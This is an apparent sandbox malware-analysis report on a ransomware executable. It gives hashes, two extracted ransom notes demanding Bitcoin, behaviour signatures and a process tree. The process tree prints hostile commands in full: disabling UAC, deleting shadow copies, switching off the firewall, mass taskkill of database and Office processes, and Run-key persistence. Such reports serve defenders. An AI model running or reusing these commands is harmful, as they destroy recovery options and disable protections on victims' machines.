Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    01/04/2021, 09:52

General

  • Target

    rcru_64.exe

  • Size

    1.0MB

  • MD5

    0d5d7377432ee449f30626c2371a0080

  • SHA1

    56a1d1203d62c131b70837d75af79aa19a3b0487

  • SHA256

    94c8cf0e19aa11a48a57baf54cc3679dda1dac4ad59ece1bf86ef117a974ddf9

  • SHA512

    19980615dbcba8ca8151aa5b93bc614b79edd1d77abbe37293001ecf16991cc939afca1cf62cac90c05510174cb8b7521a3074fbc160b47fd53d374521e06f0a

Malware Config

Extracted

Path

\??\c:\Read_Me!_.txt

Ransom Note
Your Data Locked. To Get Decryption Instructions Email Us ,Don't Edit Files Or Folders ! ID : rfeHv0 Email Address :[email protected]

Extracted

Path

C:\Users\Admin\Desktop\ReadMe_Now!.hta

Ransom Note
All Your Files Have Been Encrypted ! All Your Files Encrypted Due To A Security Problem With Your PC. If You Need Your Files Please Send Us E-mail To Get Decryption Tools .The Only Way Of Recovering Files Is To Purchase For Decryption Tools ( Payment Must Be Made With Bitcoin ) . If You Do Not E-mail Us After 48 Hours Decryption Fee Will Double.Our E-mail Address : [email protected] Personal ID : rfeHv0Sent E-mail Should Be Contains Your Personal ID.If Don't Get a Response Or Any Other Problem Write Us E-mail At : [email protected] Check Your Spam Folder Too. What Guarantee Do We Give You ? You Can Send Some Files For Decryption Test( Before Paying ). File Size Must Be Less Than 2MB And Files Should Not Contains Valuabe Data Like (Backups , Databases etc ... ) . Get Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Other Websites By Searching At Google :http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Attention !! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files Forever. In Case Of Trying To Decrypt Files With Third-Party,Recovery Sofwares This May Make The Decryption Harder So Prices Will Be Rise.

Signatures

  • UAC bypass 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 19 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 40 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\rcru_64.exe
    "C:\Users\Admin\AppData\Local\Temp\rcru_64.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1152
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Modifies registry key
        PID:1976
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1972
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1772
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
          PID:1764
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall set opmode mode=disable
          3⤵
            PID:916
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
            3⤵
              PID:544
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1108
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im notepad.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1224
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im msftesql.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1984
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlagent.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1784
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlbrowser.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1584
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlservr.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1352
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlwriter.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:976
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im oracle.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1764
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im ocssd.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1812
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im dbsnmp.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:304
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im synctime.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1624
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im agntsvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2008
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mydesktopqos.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1896
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im isqlplussvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1612
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im xfssvccon.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1456
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mydesktopservice.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1056
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im ocautoupds.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:284
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im agntsvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im encsvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1188
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im firefoxconfig.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1996
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im tbirdconfig.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1776
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im ocomm.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1716
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mysqld.exe
              3⤵
              • Kills process with taskkill
              PID:1616
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mysqld-nt.exe
              3⤵
              • Kills process with taskkill
              PID:664
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mysqld-opt.exe
              3⤵
              • Kills process with taskkill
              PID:804
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im dbeng50.exe
              3⤵
              • Kills process with taskkill
              PID:468
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqbcoreservice.exe
              3⤵
              • Kills process with taskkill
              PID:668
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im excel.exe
              3⤵
              • Kills process with taskkill
              PID:1196
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im infopath.exe
              3⤵
              • Kills process with taskkill
              PID:1224
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im msaccess.exe
              3⤵
              • Kills process with taskkill
              PID:1984
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mspub.exe
              3⤵
              • Kills process with taskkill
              PID:1784
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im onenote.exe
              3⤵
              • Kills process with taskkill
              PID:1692
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im outlook.exe
              3⤵
              • Kills process with taskkill
              PID:1772
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im powerpnt.exe
              3⤵
              • Kills process with taskkill
              PID:1380
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im steam.exe
              3⤵
              • Kills process with taskkill
              PID:284
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im thebat.exe
              3⤵
              • Kills process with taskkill
              PID:916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im thebat64.exe
              3⤵
              • Kills process with taskkill
              PID:556
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im thunderbird.exe
              3⤵
              • Kills process with taskkill
              PID:296
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im visio.exe
              3⤵
              • Kills process with taskkill
              PID:1304
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im winword.exe
              3⤵
              • Kills process with taskkill
              PID:1584
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im wordpad.exe
              3⤵
              • Kills process with taskkill
              PID:1456
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c echo %date%-%time%
            2⤵
              PID:1056
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ver
              2⤵
                PID:1352
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
                2⤵
                  PID:612
                  • C:\Windows\SysWOW64\nslookup.exe
                    nslookup myip.opendns.com. resolver1.opendns.com
                    3⤵
                      PID:324
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                    2⤵
                      PID:1460
                      • C:\Windows\SysWOW64\reg.exe
                        reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                        3⤵
                          PID:1060
                        • C:\Windows\SysWOW64\reg.exe
                          reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                          3⤵
                          • Modifies registry key
                          PID:1188
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                        2⤵
                          PID:1968
                          • C:\Windows\SysWOW64\reg.exe
                            reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                            3⤵
                            • Adds Run key to start application
                            • Modifies registry key
                            PID:896
                          • C:\Windows\SysWOW64\reg.exe
                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                            3⤵
                            • Adds Run key to start application
                            PID:1104
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\ReadMe_Now!.hta"
                          2⤵
                          • Modifies Internet Explorer settings
                          PID:1204
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Documents and Settings\Admin\Desktop\ReadMe_Now!.hta"
                          2⤵
                          • Modifies Internet Explorer settings
                          PID:1724
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1316
                      • C:\Windows\explorer.exe
                        "C:\Windows\explorer.exe"
                        1⤵
                          PID:960
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x1c0
                          1⤵
                            PID:1692
                          • C:\Windows\system32\NOTEPAD.EXE
                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Read_Me!_.txt
                            1⤵
                              PID:860

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • memory/960-64-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

                              Filesize

                              8KB

                            • memory/1152-2-0x00000000760C1000-0x00000000760C3000-memory.dmp

                              Filesize

                              8KB

                            • memory/2032-67-0x000007FEF6010000-0x000007FEF628A000-memory.dmp

                              Filesize

                              2.5MB